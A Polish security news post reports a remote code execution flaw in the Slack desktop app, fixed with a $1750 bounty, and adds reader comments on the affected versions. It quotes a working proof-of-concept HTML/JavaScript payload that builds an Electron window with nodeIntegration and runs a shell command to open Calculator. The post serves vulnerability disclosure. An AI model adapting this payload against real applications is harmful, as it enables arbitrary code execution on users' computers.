Zamów książkę sekuraka o bezpieczeństwo aplikacji www!

Wykonywanie dowolnego kodu w aplikacji desktopowej Slack, bounty: 1750$

02 września 2020, 14:45 | W biegu | komentarze 2

Od kilku dni głośno jest o błędzie w Slacku, który umożliwiał wykonanie dowolnego kodu na komputerze, gdzie jedyną interakcją użytkownika było kliknięcie na wiadomość:

<html>
<body>
<script>
  // overwrite functions to get a BrowserWindow object:
  window.desktop.delegate = {}
  window.desktop.delegate.canOpenURLInWindow = () => true
  window.desktop.window = {}
  window.desktop.window.open = () => 1
  bw = window.open('about:blank') // leak BrowserWindow class
  nbw = new bw.constructor({show: false, webPreferences: {nodeIntegration: true}}) // let's make our own with nodeIntegration
  nbw.loadURL('about:blank') // need to load some URL for interaction
  nbw.webContents.executeJavaScript('this.require("child_process").exec("open /Applications/Calculator.app")') // exec command
</script>
</body>
</html>

Slack wypłacił bounty w wysokości 1750$, co zostało w społeczności odebrane jako dość niska kwota – a pojawiły się nawet kontrowersyjne wpisy innych firm, mówiące, że za ten sam błąd zapłaciłyby ponad 10000$.

Dokładniej technicznie temu błędowi przyjrzymy się podczas najbliższego BOTW w czwartek o 19:00.

–mb 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Nism0

    Albo czegoś nie rozumiem, albo jest błąd w opisie (na hackerone). Badacz podaje, że testował podatność na najwnoszej wersji 4.2 i 4.3, podczas gdy najwnoszą wersją jest 4.9.
    O co chodzi?

    Odpowiedz
    • Może dlatego że zgłoszenie było 4 miesiące temu? (choć disclose dopiero teraz)

      Odpowiedz

Odpowiedz